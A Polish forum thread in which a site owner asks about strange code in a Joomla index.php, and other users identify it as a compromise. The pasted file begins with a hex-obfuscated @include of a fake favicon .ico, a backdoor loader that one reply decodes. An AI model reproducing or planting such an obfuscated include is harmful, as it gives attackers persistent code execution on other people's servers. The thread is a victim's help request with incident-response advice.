PDA

Zobacz pełną wersję : Dziwny kod w index.php



hizel
07-11-2017, 21:28
W index.php pojawia się dziwny kod:
<?php
/*289a5*/

@include "\x2fho\x6de/\x7987\x3406\x79m/\x70ub\x6cic\x5fht\x6dl/\x6cib\x72ar\x69es\x2fjo\x6fml\x61/d\x61ta\x62as\x65/f\x61vi\x63on\x5fff\x6106\x35.i\x63o";

/*289a5*/
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/

/**
* Define the application's minimum supported PHP version as a constant so it can be referenced within the application.
*/
define('JOOMLA_MINIMUM_PHP', '5.3.10');

if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<'))
{
die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!');
}

// Saves the start time and memory usage.
$startTime = microtime(1);
$startMem = memory_get_usage();

/**
* Constant that is checked in included files to prevent direct access.
* define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower
*/
define('_JEXEC', 1);

if (file_exists(__DIR__ . '/defines.php'))
{
include_once __DIR__ . '/defines.php';
}

if (!defined('_JDEFINES'))
{
define('JPATH_BASE', __DIR__);
require_once JPATH_BASE . '/includes/defines.php';
}

require_once JPATH_BASE . '/includes/framework.php';

// Set profiler start time and memory usage and mark afterLoad in the profiler.
JDEBUG ? JProfiler::getInstance('Application')->setStart($startTime, $startMem)->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Execute the application.
$app->execute();

Jak przywrócę index.php z czystej joomli to po kilku dniach index znów jest zmieniony.
Co to jest?

Bazyl
07-11-2017, 22:25
Miałeś włamanie :-)
Wpisz w Google: joomla postępowanie po włamaniu...

Gall Anonim
07-11-2017, 23:12
Jak przywrócę index.php z czystej joomli to po kilku dniach index znów jest zmieniony.
Co to jest?
Jak już wspomniano - włam - tyle że usuwasz efekt a nie przyczynę :-)
I to jest powodem iż po paru dniach powraca.

siristru
17-11-2017, 10:54
To dołączenie pliku, tylko dla niepoznaki jest zakodowane w hex.

http://ddecode.com/hexdecoder/

Po rozkodowaniu masz ścieżkę:

/home/y87406ym/public_html/libraries/joomla/database/favicon_ffa065.ico

I widzisz jaki plik jest dołączany. Masz jakiś element na stronie dziurawy... albo na serwerze. Haker wchodzi przez lukę i ma dostęp do plików.